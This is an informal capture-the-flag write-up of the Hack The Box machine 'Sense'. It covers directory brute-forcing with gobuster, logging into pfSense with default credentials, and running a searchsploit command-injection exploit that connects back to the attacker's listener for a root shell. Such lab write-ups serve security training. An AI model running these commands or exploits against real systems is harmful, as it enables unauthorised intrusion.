🪒Sense

https://app.hackthebox.com/machines/111

The first problem was to run the gobuster, i had the following error:

Error: error on running gobuster: unable to connect to https://10.129.220.62/: invalid certificate: x509: certificate has expired or is not yet valid: current time 2024-03-11T10:06:27Z is after 2023-04-06T19:21:35Z

The problem comes from an issue with the SSL certificate on the server. The certificate either has already expired or its validity period hasn't started yet, according to the system's clock.

So the command to fix this was:

gobuster dir -u https://10.129.220.62 -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt

we found a system-users.txt directory after our scan ->

So after a quick google search we can see that pfsense default credentials is:

So via the login page at /index.html ->

rohit
pfsense

we're in a control panel:

We find this command injection potentially useful:

after a bit of enumeration, we can see how to abuse this CVE:

So let's go to this directory, and capture a request on burp:

Not sure if it's cheating (probably) but i found this script in a GitHub to exploit this vuln: https://github.com/Alamot/code-snippets/blob/master/hacking/HTB/Sense/autopwn_sense.py

Now let's see another way, let's be more manual:

Copy the payload to your local machine:

searchsploit -m /path/to/exploit

now we look at the args:

python 43560;py --rhost 10.129.220.62 --lhost 10.10.14.62 --lport 8888 --username rohit --password pfsense

nice one, get the user flag and root flag all in one ->

PreviousOpenAdminNextRedPanda

Last updated